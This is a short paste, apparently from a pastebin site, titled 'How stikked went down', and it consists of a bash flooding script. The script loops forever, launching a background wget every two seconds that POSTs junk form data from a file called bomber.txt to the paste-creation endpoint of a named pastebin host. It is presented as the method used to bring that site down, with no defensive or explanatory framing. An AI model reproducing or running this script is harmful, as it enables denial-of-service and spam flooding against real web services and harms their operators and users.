Author: Nxt471 Language: text
Description: How stikked went down Timestamp: 2007-10-17 14:27:56 -0400
View raw paste Reply
  1. #!/bin/bash
  2. while [ 1 ]; do
  3.          wget -q -O /dev/null --post-file bomber.txt http://stikked.hippstr.com/index.php/create &
  4.          sleep 2
  5. done
  6.  
  7. And bomber.txt
  8.  
  9. "title=h4x&name=1337&lang=text&code=Lorem...."
View raw paste Reply